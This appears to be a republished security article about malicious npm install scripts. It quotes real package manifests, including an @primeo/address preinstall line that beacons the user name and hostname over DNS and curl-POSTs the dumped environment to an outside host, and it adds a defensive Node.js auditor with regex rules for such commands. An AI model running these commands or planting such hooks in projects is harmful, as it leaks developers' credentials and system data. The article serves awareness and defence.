Security Risks of npm install Scripts and Malicious Packages
The article explains how npm install and preinstall scripts can be abused by malicious packages to execute unwanted commands, steal personal data, and launch attacks, and it provides several real‑world examples while recommending cautious use and strict permission controls.
npm packages can declare lifecycle hook scripts such as preinstall and postinstall that run custom commands during installation, but npm's own best-practice guidance warns against using install scripts unless they are strictly needed for compilation, because they pose significant security risks.
The risk is that a malicious package can embed a preinstall script that runs arbitrary commands on the user’s machine, potentially opening URLs, installing software, or exfiltrating data without the user’s knowledge.
Example 1 – ember-data-react : its preinstall script runs xdg-open 'https://www.youtube.com/watch?v=dQw4w9WgXcQ', opening a rick‑roll page on Linux systems.
{
  "scripts": {
    "open": "xdg-open 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'",
    "preinstall": "npm run open",
    "test": "npm run open"
  }
}
Example 2 – inferium : its preinstall script launches 20 Firefox tabs playing two YouTube videos repeatedly.
{
  "scripts": {
    "preinstall": "for i in {1..10}; do firefox https://www.youtube.com/watch?v=48rz8udZBmQ & firefox https://www.youtube.com/watch?v=FavUpD_IjVY & done &"
  }
}
Example 3 – micro-username : its install script uses curl to send the current user name, working directory, and hostname to a remote server, exposing personal information.
Example 4 – @primeo/address : the preinstall script performs four actions: two nslookup queries that embed the user name and host name in the looked-up domain, a curl POST of package.json, and a curl POST of the environment variables saved in /tmp/.env, effectively leaking the entire environment.
{
  "scripts": {
    "preinstall": "nslookup $(whoami).u.pkgio.com ; nslookup $(uname --nodename).h.pkgio.com ; curl -X POST -d @package.json -H 'X-BOT: nope' https://www.pkgio.com/.x773/package.json ; env > /tmp/.env ; curl -X POST -d @/tmp/.env -H 'X-BOT: nope' https://www.pkgio.com/.x773/env.json"
  }
}
Example 5 – node-hsf : disguises itself as an Alibaba open‑source library, then uses nohup to download and execute a remote script in the background, making the malicious behavior hard to detect.
These examples demonstrate that npm install scripts can be weaponized to open unwanted webpages, flood browsers with tabs, and silently steal system information or environment data. The article concludes by urging developers to use install scripts only when absolutely necessary, to limit their permissions, keep dependencies up‑to‑date, and prefer well‑vetted packages.
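As an added example (not code from the original article or the packages it names), the following Node.js script audits the lifecycle hooks in a parsed package.json for the patterns the five examples above rely on: network clients, DNS beacons, environment dumps, background execution, browser launches and shell substitution. The rule names and the `auditManifest`/`isSuspicious` functions are this example's own; the two manifests at the bottom are constructed from the examples above.

```javascript
// Added example: audit package.json lifecycle hooks for the patterns seen above.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic rules for this example only; npm ships nothing like this.
const RULES = [
  { name: "network-client",     re: /\b(curl|wget)\b/ },
  { name: "dns-beacon",         re: /\bnslookup\b/ },
  { name: "env-dump",           re: /\benv\b\s*>/ },
  { name: "background-exec",    re: /\bnohup\b|&\s*$/ },
  { name: "opens-browser",      re: /\b(xdg-open|firefox|open|start)\b\s+['"]?https?:/ },
  { name: "shell-substitution", re: /\$\(|`/ },
];

// Follow `npm run <name>` indirection (ember-data-react hides xdg-open behind
// a second script) so the rules inspect the command that actually executes.
function resolveCommand(scripts, cmd, depth = 0) {
  const m = /^npm run (\S+)$/.exec(cmd.trim());
  if (m && typeof scripts[m[1]] === "string" && depth < 3) {
    return resolveCommand(scripts, scripts[m[1]], depth + 1);
  }
  return cmd;
}

// One finding per lifecycle hook present: the resolved command and matched rules.
function auditManifest(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] !== "string") continue;
    const command = resolveCommand(scripts, scripts[hook]);
    const rules = RULES.filter((r) => r.re.test(command)).map((r) => r.name);
    findings.push({ hook, command, rules });
  }
  return findings;
}

function isSuspicious(pkg) {
  return auditManifest(pkg).some((f) => f.rules.length > 0);
}

// Constructed manifests copied from the examples above, plus a benign one.
const EMBER_DATA_REACT = { scripts: { open: "xdg-open 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'", preinstall: "npm run open", test: "npm run open" } };
const PRIMEO_ADDRESS = { scripts: { preinstall: "nslookup $(whoami).u.pkgio.com ; nslookup $(uname --nodename).h.pkgio.com ; curl -X POST -d @package.json -H 'X-BOT: nope' https://www.pkgio.com/.x773/package.json ; env > /tmp/.env ; curl -X POST -d @/tmp/.env -H 'X-BOT: nope' https://www.pkgio.com/.x773/env.json" } };
const BENIGN = { scripts: { build: "tsc", test: "jest" } };

console.log(JSON.stringify(auditManifest(PRIMEO_ADDRESS), null, 2));
```

A check like this complements, rather than replaces, disabling hooks by default with `ignore-scripts=true` in `.npmrc` (or `npm install --ignore-scripts`) and re-enabling them only for the packages that genuinely need to compile.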
Reference: https://blog.sandworm.dev/the-npm-packages-that-troll-you
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact us and we will review it promptly.
IT Services Circle